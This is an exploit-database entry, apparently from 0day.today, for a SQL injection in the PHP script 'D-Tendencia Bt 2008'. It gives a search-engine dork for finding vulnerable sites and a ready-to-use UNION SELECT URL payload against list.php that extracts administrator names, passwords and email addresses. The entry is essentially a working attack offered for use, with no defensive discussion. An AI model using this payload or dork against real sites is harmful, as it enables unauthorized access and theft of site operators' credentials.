id: 10278
date: 12/16/2009
title: D-Tendencia Bt 2008 SQL Injection Vulnerability
author: Dr.0rYX
cves: 

===============================================
D-Tendencia Bt 2008 SQL Injection Vulnerability
===============================================

***************************************************************************/
 
[ Software Information ]
 
[+] Vendor : http://www.autoabc.hu/
[+] script   : D-Tendencia Bt 2008
[+] Download : http://www.autoabc.hu/ (sell script)
[+] Vulnerability : php SQL injection
[+] Dork :inurl:"list.php?lcat_id="
 
**************************************************************************/
[ Vulnerable File ]
 
http://server/list.php?lcat_id=[N.A.S.T ]
 
[ Exploit ]
 
http://server/list.php?lcat_id=-1+union+select+concat(admin_name,0x3a,admin_pass,0x3a,admin_mail)+from+admin



#  0day.today [2023-03-24]  #